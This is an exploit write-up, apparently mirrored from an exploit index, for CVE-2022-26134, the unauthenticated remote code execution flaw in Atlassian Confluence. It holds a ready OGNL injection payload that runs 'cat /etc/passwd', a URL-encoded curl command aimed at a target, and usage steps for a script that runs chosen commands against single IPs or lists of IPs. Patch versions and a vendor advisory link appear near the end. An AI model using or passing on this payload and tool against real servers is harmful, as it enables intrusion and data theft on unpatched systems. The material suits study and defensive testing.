## https://sploitus.com/exploit?id=C8C50EDF-39F5-5103-AC79-A8C7FA6A4B60
# CVE-2022-26134 by 1vere$k
Just simple PoC for the Atlassian Jira exploit. Provides code execution for unauthorised user on a server.
**CVE-2022-26134 - OGNL injection vulnerability.**
Script proof of concept that exploits the remote code execution vulnerability affecting Atlassian Confluence 7.18 and lower products. The OGNL injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.
## Payload
```
${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
```
**Example with CURL command:**
```
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D"
```
Then, the result of the command will be reflected in the parameter `X-Cmd-Response` in the response header.
**Mitigations guidelines from vendors**
Follow the official recommendations from Atlassian:
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
## Patched Versions
Atlassian released versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 which contain a patch for this issue.
## Usage
```
1. git clone https://github.com/iveresk/cve-2022-26134.git
2. cd cve-2022-26134
3. pip install -r requirements.txt
4. Ex#1: python3 cve-2022-26134.py <IP> <COMMAND> - command is optional - default will be set as "whoami" just to check if your server is vulnerable
5. Ex#2: 4. Ex#1: python3 cve-2022-26134.py <FILE-WITH-IPs> <COMMAND>
```
## Contact
You are free to contact me via [Keybase](https://keybase.io/1veresk) for any details.